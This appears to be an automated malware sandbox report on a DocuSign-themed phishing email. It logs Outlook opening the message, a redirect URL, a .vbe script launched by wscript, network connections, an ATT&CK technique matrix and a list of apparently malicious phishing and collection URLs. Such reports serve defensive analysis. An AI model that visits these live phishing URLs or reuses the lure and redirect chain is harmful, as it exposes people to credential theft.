            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 163.172.240.109:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.15.99:443 -> 192.168.2.16:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.16:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.16:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 110.173.134.108:443 -> 192.168.2.16:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.59:443 -> 192.168.2.16:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.2.59:443 -> 192.168.2.16:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.147.188:443 -> 192.168.2.16:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.161.136.24:443 -> 192.168.2.16:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 86.109.170.84:443 -> 192.168.2.16:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 66.29.153.55:443 -> 192.168.2.16:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 66.29.153.55:443 -> 192.168.2.16:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.220.172.6:443 -> 192.168.2.16:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.220.172.6:443 -> 192.168.2.16:49773 version: TLS 1.2
            Source: classification engineClassification label: mal100.phis.evad.winEML@28/24@32/183
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250415T0904040846-2776.etl
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Complete via DocuSign_ #Dailycer_Doc. Signature required 4_14_2025.eml"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "84EB8B22-0E1C-47C4-B964-A25CCED8EA3E" "DB1CD557-11DF-46A3-8117-B5001063451C" "2776" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "84EB8B22-0E1C-47C4-B964-A25CCED8EA3E" "DB1CD557-11DF-46A3-8117-B5001063451C" "2776" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,14906612120549523128,8134245420273908653,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1968,i,14906612120549523128,8134245420273908653,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Temp1_000180221100210.zip\000180221100210.vbe"
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: C:\Users\user\Downloads\92536330-acb6-4dca-9467-cbe601556772.tmp, type: DROPPED
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation31
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Process Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scripting
            1
            DLL Side-Loading
            1
            Modify Registry
            LSASS Memory13
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            Extra Window Memory Injection
            1
            Process Injection
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Rundll32
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Extra Window Memory Injection
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://antiphishing.vadesecure.com/v4?f=V0VXZFVqMTFjQ005eVJkcFPJ3Ia0vKOat3H1m7IYV6uL-mXl8VDNtRG_XFVyfSlj&i=QzFSMjFzQkNuU2Fwa2tkRXxi5ABFU7cwoXZii9wzdWY&k=wgG5&r=enhPYlJBWHkzOVBIbVl1WjLB0weyOtH62F9_2oXjuIBpwFaBWpn3H8YEW8PA3gyt&s=4aaf2b611feb49bcd14de90a12aa591b94d3a2af56ada00096160804699919b6&u=https%3A%2F%2Fjbse.belgrin.com.au%2F_a.html%3Fsend_id%3Deh%26tvi2_RxT%3Dwww.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH%26e%3DZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy0%Avira URL Cloudsafe
            https://jbse.belgrin.com.au/_a.html?send_id=eh&tvi2_RxT=www.dailycer.fr.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4bmU06yyz5ihLLNgvaq4se2ZJH&e=ZGF2aWQuYm9ubmVsQGRhaWx5Y2VyLmZy0%Avira URL Cloudsafe
            https://jbse.belgrin.com.au/favicon.ico0%Avira URL Cloudsafe
            https://dour-automatic-transport.glitch.me/0%Avira URL Cloudsafe
            https://reformassegura.com/wp-includes/images/Docubg.jpg0%Avira URL Cloudsafe
            https://reformassegura.com/wp-includes/images/banner.jpg0%Avira URL Cloudsafe
            https://kit.fontawesome.com/f6136e9b49.js0%Avira URL Cloudsafe
            https://logo.clearbit.com/dailycer.fr0%Avira URL Cloudsafe
            https://logo.clearbit.com/inbox.com0%Avira URL Cloudsafe
            https://xsapz.com/docu/me.php0%Avira URL Cloudsafe
            https://aicreative.be/em/e.php0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
